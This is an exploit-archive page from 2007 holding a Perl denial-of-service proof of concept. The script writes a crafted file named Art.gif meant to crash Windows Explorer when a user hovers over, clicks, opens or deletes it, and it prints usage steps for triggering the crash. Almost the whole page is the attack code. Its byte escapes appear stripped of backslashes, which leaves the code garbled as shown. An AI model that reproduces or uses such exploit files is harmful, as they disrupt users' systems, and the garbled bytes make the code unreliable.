Home / exploitsPDF  

explorergif-dos.txt

Posted on 24 July 2007

#!/usr/bin/perl ############################################################### # Bug Found By ::DeltahackingTEAM ## # Coded By Reza.Yavari (Dr.Pantagon) ## #Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com ## #Free Upload :: Www.Persianupload.com And Www.Persianupload.net ## #Email: Dr.Pantagon [A]Deltasecurity.ir ## # We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem print " GIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>"; print " generating Art.gif..."; print " Usage :"; print " 1- Mouse Over Art.gif For Excute Exploit "; print " 2- Single Click Art.gif For Excute Exploit "; print " 3- Double Clik Art.gif (Open) For Excute Exploit "; print " 4- More... "; print " You Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit"; open(gif, ">./Art.gif") or die "cannot create gif file "; print gif "x02x00x09x00x00x03x22x00x00x00x6x7x6x6x6x64"; print gif "x2Dx49x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print gif "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print gif "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print gif "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"; print gif "x9bx99x86xd1x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x95x99x99x99x99x99x99x99x98x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99xdaxd4xddxb7xdcxc1xdcx99x99x99x99x99"; print gif "x89x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x90x90x90x90x90x90x90x90"; print gif "x02x00x09x00x00x03x22x00x00x00x6x7x6x6x6x64"; print gif "x2Dx49x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print gif "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print gif "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print gif "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"; close(gif); print "ok ok Gif Exploit Creat and run exploit and wait :) ";

 

TOP